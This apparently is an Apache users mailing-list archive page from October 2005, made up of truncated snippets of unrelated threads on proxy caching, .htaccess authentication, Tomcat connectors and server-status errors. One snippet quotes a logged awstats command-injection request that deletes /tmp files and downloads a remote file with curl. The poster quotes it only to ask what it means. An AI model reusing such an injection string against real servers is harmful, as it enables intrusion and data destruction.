I say "CGI Alias" in quotations, because it's not the same type of alias that one would normally expect in Apache.
What I'm trying to do, and forgive me if it cannot be done, is make
some kind of alias so that when I write CGI scripts with the header
#!/usr/bin/perl for use in a linux environment,
Sean Conner wrote:
It was thus said that the Great Dan Trainor once stated:
The initial authentication would take place via PHP form. I understand
how 'require valid-user' works, and how it's used.
I figured out a way to do it, I'll re-post later on after I test a bit.
I'm using PHP to use a
It was thus said that the Great Dan Trainor once stated:
>
> The initial authentication would take place via PHP form. I understand
> how 'require valid-user' works, and how it's used.
>
> I figured out a way to do it, I'll re-post later on after I test a bit.
> I'm using PHP to use apache_set
On 10/22/05, Dan Trainor <[EMAIL PROTECTED]> wrote:
Hello, all -
I'm looking for a way to disable Apache's ability to secure a directory
using the .htaccess method of 'require valid-user'.
Would it be possible to enable/disable this functionality based on an
enviornment variable, for a specific
On 10/22/05, Dan Trainor <[EMAIL PROTECTED]> wrote:
> Hello, all -
>
> I'm looking for a way to disable Apache's ability to secure a directory
> using the .htaccess method of 'require valid-user'.
>
> Would it be possible to enable/disable this functionality based on an
> enviornment variable, for
Hello
Somebody know how to configure Apache2 and Tomcat5 using
jakarta-tomcat-connectors
Regards
--
Leonardo Hernández
Leonardo
Hernández
COMISION
NACIONAL PARA EL
CONOCIMIENTO Y USO DE LA BIODIVERSIDAD
Av. Liga Periférico-Insurgentes Sur # 4903
Parques del Pedregal, Tlalpan
14010,
Hello, all -
I'm looking for a way to disable Apache's ability to secure a directory
using the .htaccess method of 'require valid-user'.
Would it be possible to enable/disable this functionality based on an
enviornment variable, for a specific user? I'm not terribly keen on
Apache's conditional
On Saturday 22 October 2005 20:53, Yavor Trapkov wrote:
> Good point!, but it doesn't seems to be marked uncachable, here are two
> examples
>
>
> HTTP request sent, awaiting response...
> HTTP/1.1 200 OK
> Set-Cookie: JSESSIONID=8A211D396681857816C48E62C2E0D8A5; Path=/
> Content
On 10/22/05, Yavor Trapkov <[EMAIL PROTECTED]> wrote:
> Good point!, but it doesn't seems to be marked uncachable, here are two
> examples
Although you are going to run into problem with the cookies, I agree
those look cachable.
Next: turn LogLevel to debug and check the error log.
Joshua.
---
On Sat, 2005-10-22 at 15:16 -0400, Joshua Slive wrote:
> On 10/21/05, Oil Pine <[EMAIL PROTECTED]> wrote:
> > Hello,
> >
> > I've just installed Fedora Core 3 and begun to configure Apache2. I am
> > reading the config file that was installed by FC3. I have difficulty
> > understanding the followin
Good point!, but it doesn't seems to be marked uncachable, here are two examples
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8A211D396681857816C48E62C2E0D8A5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 18
Date: Sat, 2
On 10/22/05, Yavor Trapkov <[EMAIL PROTECTED]> wrote:
> Hello,
>
> I'm using apache (2.0.54) as a frontend server to proxy content from
> application servers,
>
> I'd like to enable caching in order to decrease the load of the backend
> servers,
>
> I tried to add CacheEnable directive:
>
> Proxy
On 10/22/05, John Oliver <[EMAIL PROTECTED]> wrote:
> I updated two Fedora Core 2 servers from 2.0.51 to 2.0.54 One still
> works just fine. The other can no longer access
> http://localhost/server-status
>
> [Sat Oct 22 09:17:36 2005] [error] [client 127.0.0.1] client denied by
> server configur
Hello,
I'm using apache (2.0.54) as a frontend server to proxy content from
application servers,
I'd like to enable caching in order to decrease the load of the backend servers,
I tried to add CacheEnable directive:
ProxyPass/content1 http://server:8080/content1
ProxyPassReverse /conte
On 10/21/05, Oil Pine <[EMAIL PROTECTED]> wrote:
> Hello,
>
> I've just installed Fedora Core 3 and begun to configure Apache2. I am
> reading the config file that was installed by FC3. I have difficulty
> understanding the following instruction. I understand I can simply
> comment this out, but I
I updated two Fedora Core 2 servers from 2.0.51 to 2.0.54 One still
works just fine. The other can no longer access
http://localhost/server-status
[Sat Oct 22 09:17:36 2005] [error] [client 127.0.0.1] client denied by
server configuration: /home/www/server-status
SetHandler server-status
On 10/22/05, Dave Floyd <[EMAIL PROTECTED]> wrote:
> >My apache logs show rows after rows of following, all from various IP
> >addresses. This started a couple of days ago. I don't have awstats.
> >Could somebody tell me what is that? Is there anything I should be
> >doing? thanks.K.
> >GET
> >//aw
I have never had this problem on Debian, but its a common problem on
winxp. I just normally end all of the threads, and then restart the
service. Then Apache is fine for a week or so.On 10/19/05, Joshua Slive <[EMAIL PROTECTED]> wrote:
On 10/19/05, Marius Pumputis <[EMAIL PROTECTED]> wrote:> I have
David Tonhofer, m-plify S.A. wrote:
--On Friday, October 21, 2005 11:16 AM -0700 Marc Perkel
<[EMAIL PROTECTED]> wrote:
David Tonhofer, m-plify S.A. wrote:
I really don't know what the problem could be but let's
start a discussion:
1) How many children are there?
2) What is the sum
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
Hello there!
I think I've fixed this bug.
It's util_ldap_cache.c:util_ldap_cache_module_kill()
...
if (st->cache_shm != NULL) {
apr_status_t result = apr_shm_destroy(st->cache_shm);
st->cache_shm = NULL;
apr_file_remove(st->cache_file, st->pool);
It should be checked either w
21 matches
Mail list logo